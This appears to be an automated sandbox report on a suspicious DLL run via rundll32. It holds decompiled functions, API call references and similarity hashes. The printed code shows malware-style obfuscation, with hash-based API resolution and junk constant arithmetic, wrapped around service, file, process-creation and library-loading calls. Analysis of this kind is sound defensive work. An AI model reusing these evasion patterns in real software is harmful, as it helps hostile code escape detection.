                                                                                                                    				void* _t29;
                                                                                                                    				void* _t34;
                                                                                                                    
                                                                                                                    				_push(__ecx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				_push(_a20);
                                                                                                                    				_t34 = __edx;
                                                                                                                    				_push(_a16);
                                                                                                                    				_push(_a12);
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__edx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E001D20B9(_t24);
                                                                                                                    				_v8 = 0x971c9e;
                                                                                                                    				_v8 = _v8 >> 3;
                                                                                                                    				_v8 = _v8 + 0xbdaa;
                                                                                                                    				_v8 = _v8 | 0x44f2c0c3;
                                                                                                                    				_v8 = _v8 ^ 0x44fb9439;
                                                                                                                    				_v12 = 0x762558;
                                                                                                                    				_v12 = _v12 | 0xdc63e739;
                                                                                                                    				_v12 = _v12 ^ 0xdc7b8d87;
                                                                                                                    				E001DAA30(0x20c, 0x20a9b263, __ecx, 0x47b96070);
                                                                                                                    				_t29 = OpenServiceW(_t34, _a12, _a8); // executed
                                                                                                                    				return _t29;
                                                                                                                    			}









                                                                                                                    APIs
                                                                                                                    • OpenServiceW.ADVAPI32(00000000,?,2635DC09,?,?,?,2635DC09,001D4A8F,?,?,2635DC09), ref: 001C433F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.541549254.00000000001C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000000A.00000002.541592520.00000000001E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_1c0000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: OpenService
                                                                                                                    • String ID: X%v
                                                                                                                    • API String ID: 3098006287-3430654708
                                                                                                                    • Opcode ID: a6c45227f0e40a07600cbbb7be6837513f8e3cf64bcdc6244eca30a284eb53f8
                                                                                                                    • Instruction ID: 3bebb619aadb5032a6cf0e803a0a7b7629517103a68ccd80fb68753a7249bede
                                                                                                                    • Opcode Fuzzy Hash: a6c45227f0e40a07600cbbb7be6837513f8e3cf64bcdc6244eca30a284eb53f8
                                                                                                                    • Instruction Fuzzy Hash: 5A0144B281120CFBDF05DFD0D9468DEBF78EF14310F108189F90562221D3729B209B91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 260 1c8f65-1c9010 call 1d20b9 call 1daa30 CreateFileW
                                                                                                                    C-Code - Quality: 35%
                                                                                                                    			E001C8F65(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, long _a12, long _a20, intOrPtr _a24, long _a28, intOrPtr _a32, long _a40) {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				void* _v24;
                                                                                                                    				intOrPtr _v28;
                                                                                                                    				void* _t32;
                                                                                                                    				void* _t38;
                                                                                                                    
                                                                                                                    				_push(_a40);
                                                                                                                    				_push(0);
                                                                                                                    				_push(_a32);
                                                                                                                    				_push(_a28);
                                                                                                                    				_push(_a24);
                                                                                                                    				_push(_a20);
                                                                                                                    				_push(0);
                                                                                                                    				_push(_a12);
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E001D20B9(_t32);
                                                                                                                    				_v28 = 0xee6fdc;
                                                                                                                    				asm("stosd");
                                                                                                                    				asm("stosd");
                                                                                                                    				asm("stosd");
                                                                                                                    				_v12 = 0x957ab3;
                                                                                                                    				_v12 = _v12 ^ 0x02d9a910;
                                                                                                                    				_v12 = _v12 + 0xffff8488;
                                                                                                                    				_v12 = _v12 ^ 0x02485b8e;
                                                                                                                    				_v8 = 0xf6b813;
                                                                                                                    				_v8 = _v8 + 0xffff9c70;
                                                                                                                    				_v8 = _v8 + 0xffff858c;
                                                                                                                    				_v8 = _v8 ^ 0x00f72129;
                                                                                                                    				E001DAA30(0xe9, 0x9df7cc0d, __ecx, 0xa7362403);
                                                                                                                    				_t38 = CreateFileW(_a4, _a20, _a40, 0, _a28, _a12, 0); // executed
                                                                                                                    				return _t38;
                                                                                                                    			}










                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(02485B8E,00EE6FDC,?,00000000,65528FD4,?,00000000), ref: 001C9009
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.541549254.00000000001C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000000A.00000002.541592520.00000000001E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_1c0000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: 18f2a3f1900b150d1c8a29a5a24bb32d68d7ea1513a2f5f5666481f22823c7ab
                                                                                                                    • Instruction ID: eefa312d0f5cf9b642953b9b833767571b64715d804af2f9767145128d387c31
                                                                                                                    • Opcode Fuzzy Hash: 18f2a3f1900b150d1c8a29a5a24bb32d68d7ea1513a2f5f5666481f22823c7ab
                                                                                                                    • Instruction Fuzzy Hash: C5112B72900219FBCF219FE5DD098DFBFB5EF58354F118149F90862121C3728A61EB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 265 1c7f5d-1c7ff1 call 1d20b9 call 1daa30 CreateProcessW
                                                                                                                    APIs
                                                                                                                    • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,001CAD99,?,?,?,181C8C04,001CAD99), ref: 001C7FEB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.541549254.00000000001C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000000A.00000002.541592520.00000000001E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_1c0000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 963392458-0
                                                                                                                    • Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                    • Instruction ID: cb67c80931af881b161768f173d6e3b06836fdbd1472b9c07ea7dc0393155320
                                                                                                                    • Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                    • Instruction Fuzzy Hash: 0D11D372402128BBDF619F91DD09CEF7F79EF193A4F549244FA1921121D3728A60EBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 270 1c4ddd-1c4e73 call 1d20b9 call 1daa30 SHFileOperationW
                                                                                                                    C-Code - Quality: 16%
                                                                                                                    			E001C4DDD(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				intOrPtr _v20;
                                                                                                                    				intOrPtr _v24;
                                                                                                                    				void* _t30;
                                                                                                                    				int _t38;
                                                                                                                    				signed int _t40;
                                                                                                                    				signed int _t44;
                                                                                                                    				struct _SHFILEOPSTRUCTW* _t45;
                                                                                                                    
                                                                                                                    				_push(_a12);
                                                                                                                    				_t45 = __edx;
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__edx);
                                                                                                                    				E001D20B9(_t30);
                                                                                                                    				_v16 = _v16 & 0x00000000;
                                                                                                                    				_v24 = 0x8324bd;
                                                                                                                    				_v20 = 0xe59c0f;
                                                                                                                    				_v12 = 0xfa6a5a;
                                                                                                                    				_v12 = _v12 | 0x6fcfbea7;
                                                                                                                    				_t40 = 0x1a;
                                                                                                                    				_push(0x3771311d);
                                                                                                                    				_push(_t40);
                                                                                                                    				_v12 = _v12 * 0x42;
                                                                                                                    				_v12 = _v12 ^ 0xdff430a4;
                                                                                                                    				_v8 = 0x460bc4;
                                                                                                                    				_v8 = _v8 | 0x3946640e;
                                                                                                                    				_push(0xdf0d4f1a);
                                                                                                                    				_v8 = _v8 / _t40;
                                                                                                                    				_v8 = _v8 + 0x2a2;
                                                                                                                    				_v8 = _v8 ^ 0x023f16a4;
                                                                                                                    				_t44 = 0x58;
                                                                                                                    				E001DAA30(_t44);
                                                                                                                    				_t38 = SHFileOperationW(_t45); // executed
                                                                                                                    				return _t38;
                                                                                                                    			}

                                                                                                                    APIs
                                                                                                                    • SHFileOperationW.SHELL32(12DA7D1B,?,?,?,?,?,?,?,?), ref: 001C4E6D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.541549254.00000000001C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000000A.00000002.541592520.00000000001E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_1c0000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FileOperation
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3080627654-0
                                                                                                                    • Opcode ID: 5a6999f68b0982e57ffb7ab1c7ed40ff32dcce97c4b5d87dd0d5c33dbec08c15
                                                                                                                    • Instruction ID: 53574c39e5200cc11d8abbe26beb95054f6f81559dff106a5dd9800b56d6cfd3
                                                                                                                    • Opcode Fuzzy Hash: 5a6999f68b0982e57ffb7ab1c7ed40ff32dcce97c4b5d87dd0d5c33dbec08c15
                                                                                                                    • Instruction Fuzzy Hash: 27015BB5E0120DFBCB14EFA4D9469DEBFB4EF40314F50C089E904A7251D3B44B549B91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    C-Code - Quality: 58%
                                                                                                                    			E001C5DDD(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                    				unsigned int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				void* _t21;
                                                                                                                    				intOrPtr* _t25;
                                                                                                                    				void* _t26;
                                                                                                                    				void* _t30;
                                                                                                                    				void* _t31;
                                                                                                                    				void* _t33;
                                                                                                                    				intOrPtr _t34;
                                                                                                                    
                                                                                                                    				_t31 = __edx;
                                                                                                                    				_t34 = __ecx;
                                                                                                                    				E001D20B9(_t21);
                                                                                                                    				_v12 = 0x9fac18;
                                                                                                                    				_v12 = _v12 ^ 0x90454497;
                                                                                                                    				_v12 = _v12 ^ 0x90d3245f;
                                                                                                                    				_v8 = 0x647eb;
                                                                                                                    				_v8 = _v8 >> 0xd;
                                                                                                                    				_v8 = _v8 >> 3;
                                                                                                                    				_v8 = _v8 + 0xffff0b9f;
                                                                                                                    				_v8 = _v8 ^ 0xfff54d3d;
                                                                                                                    				_t25 = E001DAA30(0x2d1, 0x9df7cc0d, __ecx, 0x5aaf08f1);
                                                                                                                    				_t26 =  *_t25(_t31, 0, _t34, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28, _t30, _t33, __ecx, __ecx); // executed
                                                                                                                    				return _t26;
                                                                                                                    			}

                                                                                                                    APIs
                                                                                                                    • SetFileInformationByHandle.KERNEL32(65528FD4,00000000,?,00000028), ref: 001C5E58
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.541549254.00000000001C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000000A.00000002.541592520.00000000001E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_1c0000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FileHandleInformation
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3935143524-0
                                                                                                                    • Opcode ID: 1342c75f1a0eb519f77f2bc21feb826310fd141c5a5d19468efb3ead449ac199
                                                                                                                    • Instruction ID: 906d8cfdda33e675e2ee861f7666a07b35c15f671ed7052db51e1d3ff6a1388d
                                                                                                                    • Opcode Fuzzy Hash: 1342c75f1a0eb519f77f2bc21feb826310fd141c5a5d19468efb3ead449ac199
                                                                                                                    • Instruction Fuzzy Hash: 3F018F7694120CBBDB24DED5CC0AEEEBF74EF55714F108089F50466250D7B15B50DBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 280 1c1e22-1c1ea6 call 1d20b9 call 1daa30 RtlAllocateHeap
                                                                                                                    C-Code - Quality: 58%
                                                                                                                    			E001C1E22(long __ecx, void* __edx, long _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				void* _t27;
                                                                                                                    				void* _t34;
                                                                                                                    				signed int _t36;
                                                                                                                    				long _t42;
                                                                                                                    
                                                                                                                    				_push(__ecx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				_push(_a16);
                                                                                                                    				_t42 = __ecx;
                                                                                                                    				_push(_a12);
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E001D20B9(_t27);
                                                                                                                    				_v12 = 0x309d17;
                                                                                                                    				_v12 = _v12 | 0x1b560655;
                                                                                                                    				_v12 = _v12 ^ 0x1b78328a;
                                                                                                                    				_v8 = 0xa187d;
                                                                                                                    				_v8 = _v8 + 0xa972;
                                                                                                                    				_t36 = 0x67;
                                                                                                                    				_v8 = _v8 / _t36;
                                                                                                                    				_v8 = _v8 << 7;
                                                                                                                    				_v8 = _v8 ^ 0x000b519a;
                                                                                                                    				E001DAA30(0x1c2, 0x9df7cc0d, _t36, 0x8eab3015);
                                                                                                                    				_t34 = RtlAllocateHeap(_a8, _t42, _a4); // executed
                                                                                                                    				return _t34;
                                                                                                                    			}

                                                                                                                    APIs
                                                                                                                    • RtlAllocateHeap.NTDLL(AF136809,000C892D,1B78328A,?,?,?,001C80DB,?,00000000,AF136809), ref: 001C1EA0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.541549254.00000000001C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000000A.00000002.541592520.00000000001E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_1c0000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1279760036-0
                                                                                                                    • Opcode ID: 17d2fe5eb58d72b3578096db544abd1a3df4a71cc1238501c62d01f2d4a045a2
                                                                                                                    • Instruction ID: a7c90d1943c5424bf908a449a8f909264212c96b150336414c4ac1880160e9f9
                                                                                                                    • Opcode Fuzzy Hash: 17d2fe5eb58d72b3578096db544abd1a3df4a71cc1238501c62d01f2d4a045a2
                                                                                                                    • Instruction Fuzzy Hash: EA014476901208FBEB05DFD4DC0A8DE7BB5EF45354F208089F9086A211E7B29F20AB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 285 1d46bb-1d473b call 1d20b9 call 1daa30 SHGetFolderPathW
                                                                                                                    C-Code - Quality: 58%
                                                                                                                    			E001D46BB(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				intOrPtr _v16;
                                                                                                                    				intOrPtr _v20;
                                                                                                                    				void* _t21;
                                                                                                                    				intOrPtr* _t25;
                                                                                                                    				void* _t26;
                                                                                                                    
                                                                                                                    				E001D20B9(_t21);
                                                                                                                    				_v20 = 0x3f5bb0;
                                                                                                                    				_v16 = 0;
                                                                                                                    				_v12 = 0x996874;
                                                                                                                    				_v12 = _v12 << 0xf;
                                                                                                                    				_v12 = _v12 ^ 0xb43bad9d;
                                                                                                                    				_v8 = 0xebf0af;
                                                                                                                    				_v8 = _v8 ^ 0x3b7dcb24;
                                                                                                                    				_v8 = _v8 ^ 0x3b96d1fd;
                                                                                                                    				_t25 = E001DAA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
                                                                                                                    				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
                                                                                                                    				return _t26;
                                                                                                                    			}











                                                                                                                    APIs
                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 001D4735
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.541549254.00000000001C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000000A.00000002.541592520.00000000001E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_1c0000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FolderPath
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1514166925-0
                                                                                                                    • Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                    • Instruction ID: 561b3523fc2865a53db48b2c132ef2413f53b5766f007e29b481afcc78b8c7ce
                                                                                                                    • Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                    • Instruction Fuzzy Hash: 90012C75801228BBCF15AFD5DC098DFBFB8EF45394F108145F91826211D3758A60DBD1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 73%
                                                                                                                    			E001C93ED() {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				void* _v24;
                                                                                                                    				intOrPtr _v28;
                                                                                                                    				intOrPtr _t24;
                                                                                                                    
                                                                                                                    				_v28 = 0xda6c64;
                                                                                                                    				asm("stosd");
                                                                                                                    				asm("stosd");
                                                                                                                    				asm("stosd");
                                                                                                                    				_v12 = 0x88a564;
                                                                                                                    				_v12 = _v12 | 0x9bf5ed5c;
                                                                                                                    				_v12 = _v12 ^ 0x9bf17c37;
                                                                                                                    				_v8 = 0xd9241f;
                                                                                                                    				_v8 = _v8 * 0x5c;
                                                                                                                    				_v8 = _v8 + 0xccdd;
                                                                                                                    				_v8 = _v8 + 0x903;
                                                                                                                    				_v8 = _v8 ^ 0x4e0c4bb2;
                                                                                                                    				E001DAA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
                                                                                                                    				ExitProcess(0);
                                                                                                                    			}









                                                                                                                    APIs
                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 001C945B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.541549254.00000000001C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000000A.00000002.541592520.00000000001E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_1c0000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ExitProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 621844428-0
                                                                                                                    • Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                    • Instruction ID: 5b4dbfde60cfaf4d518504bc2e5eca56c9af72ce4d91db2b238e4d335286621a
                                                                                                                    • Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                    • Instruction Fuzzy Hash: 92F03C71901308FBEB04DBE8DA4699DFBB4EB50314F2081A9D604B3261E7B05F459A91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 55%
                                                                                                                    			E001D8F9E(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                                                                    				unsigned int _v8;
                                                                                                                    				unsigned int _v12;
                                                                                                                    				void* _t19;
                                                                                                                    				int _t24;
                                                                                                                    
                                                                                                                    				_push(__ecx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				_push(_a12);
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E001D20B9(_t19);
                                                                                                                    				_v12 = 0xd87912;
                                                                                                                    				_v12 = _v12 >> 7;
                                                                                                                    				_v12 = _v12 ^ 0x0006adfb;
                                                                                                                    				_v8 = 0xf5ad8e;
                                                                                                                    				_v8 = _v8 + 0xc481;
                                                                                                                    				_v8 = _v8 >> 4;
                                                                                                                    				_v8 = _v8 ^ 0x00032ff7;
                                                                                                                    				E001DAA30(0x26e, 0x20a9b263, __ecx, 0x37d4b579);
                                                                                                                    				_t24 = CloseServiceHandle(_a12); // executed
                                                                                                                    				return _t24;
                                                                                                                    			}








                                                                                                                    APIs
                                                                                                                    • CloseServiceHandle.ADVAPI32(33E0711C), ref: 001D9002
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.541549254.00000000001C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000000A.00000002.541592520.00000000001E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_1c0000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandleService
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1725840886-0
                                                                                                                    • Opcode ID: 7721f494cb045c1adf2975ecc10c8ea825fd6ee4babf1da4d00f55aede024231
                                                                                                                    • Instruction ID: 6d76eb703b8896e975a64c93da87ddeb80f5a70e36894a4b01e662692c1ea686
                                                                                                                    • Opcode Fuzzy Hash: 7721f494cb045c1adf2975ecc10c8ea825fd6ee4babf1da4d00f55aede024231
                                                                                                                    • Instruction Fuzzy Hash: F3F0F9B591520CFFDF05EFD4C94A89EBBB4EB24308F208198F80562611D7B69B64EF51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 68%
                                                                                                                    			E001D1F8A(intOrPtr __ecx, void* __edx, WCHAR* _a4) {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				void* _t19;
                                                                                                                    				int _t25;
                                                                                                                    
                                                                                                                    				_push(__ecx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E001D20B9(_t19);
                                                                                                                    				_v12 = 0x96b134;
                                                                                                                    				_v12 = _v12 + 0xdeb4;
                                                                                                                    				_v12 = _v12 | 0x0c5d8169;
                                                                                                                    				_v12 = _v12 ^ 0x0cdc4dba;
                                                                                                                    				_v8 = 0xf8ae2a;
                                                                                                                    				_v8 = _v8 + 0xcab3;
                                                                                                                    				_v8 = _v8 * 0x2b;
                                                                                                                    				_v8 = _v8 ^ 0x29e0cf29;
                                                                                                                    				E001DAA30(0x112, 0x9df7cc0d, __ecx, 0x6fe24f6c);
                                                                                                                    				_t25 = DeleteFileW(_a4); // executed
                                                                                                                    				return _t25;
                                                                                                                    			}








                                                                                                                    APIs
                                                                                                                    • DeleteFileW.KERNEL32(0CDC4DBA,?,?,?,?), ref: 001D1FF5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.541549254.00000000001C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000000A.00000002.541592520.00000000001E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_1c0000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4033686569-0
                                                                                                                    • Opcode ID: d9141e2dac26f15b35629e5f1bbea3b611062587ec9c1243f53570606ca8c40c
                                                                                                                    • Instruction ID: 5759bbd17aceee5f28a676ddff07c8de3ce8a2e55a89f5369183327290a9c410
                                                                                                                    • Opcode Fuzzy Hash: d9141e2dac26f15b35629e5f1bbea3b611062587ec9c1243f53570606ca8c40c
                                                                                                                    • Instruction Fuzzy Hash: 4FF0F9B190120CFBDF18EFD4D9468AEBFB5EB50304F20829AF40467222E7715F549B91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 76%
                                                                                                                    			E001D5BFD(intOrPtr __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
                                                                                                                    				signed int _v8;
                                                                                                                    				unsigned int _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				intOrPtr _v20;
                                                                                                                    				intOrPtr _v24;
                                                                                                                    				void* _t20;
                                                                                                                    				struct HINSTANCE__* _t25;
                                                                                                                    
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E001D20B9(_t20);
                                                                                                                    				_v16 = _v16 & 0x00000000;
                                                                                                                    				_v24 = 0x5faaf9;
                                                                                                                    				_v20 = 0xab22cd;
                                                                                                                    				_v12 = 0x8e3542;
                                                                                                                    				_v12 = _v12 >> 7;
                                                                                                                    				_v12 = _v12 ^ 0x00089943;
                                                                                                                    				_v8 = 0x9b967a;
                                                                                                                    				_v8 = _v8 ^ 0x4689732a;
                                                                                                                    				_v8 = _v8 ^ 0x4619bdd7;
                                                                                                                    				E001DAA30(0x12d, 0x9df7cc0d, __ecx, 0xf5e9dd1e);
                                                                                                                    				_t25 = LoadLibraryW(_a8); // executed
                                                                                                                    				return _t25;
                                                                                                                    			}











                                                                                                                    APIs
                                                                                                                    • LoadLibraryW.KERNEL32(00000000), ref: 001D5C6D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.541549254.00000000001C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000000A.00000002.541592520.00000000001E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_1c0000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoad
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1029625771-0
                                                                                                                    • Opcode ID: e382c7baeaf3a69a46a4a7878245b3f76dac83df27b8d9f7b041c7ed08bbac4f
                                                                                                                    • Instruction ID: 8201e592a2a42ee05521dd926d4e134f6b081d0977a11c127cdf71e219bc2fba
                                                                                                                    • Opcode Fuzzy Hash: e382c7baeaf3a69a46a4a7878245b3f76dac83df27b8d9f7b041c7ed08bbac4f
                                                                                                                    • Instruction Fuzzy Hash: 41F0FFB5C0020CFBCF04EFE4DA06AEEBBB4FB50318F508188E91566212D3B54B58DB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 58%
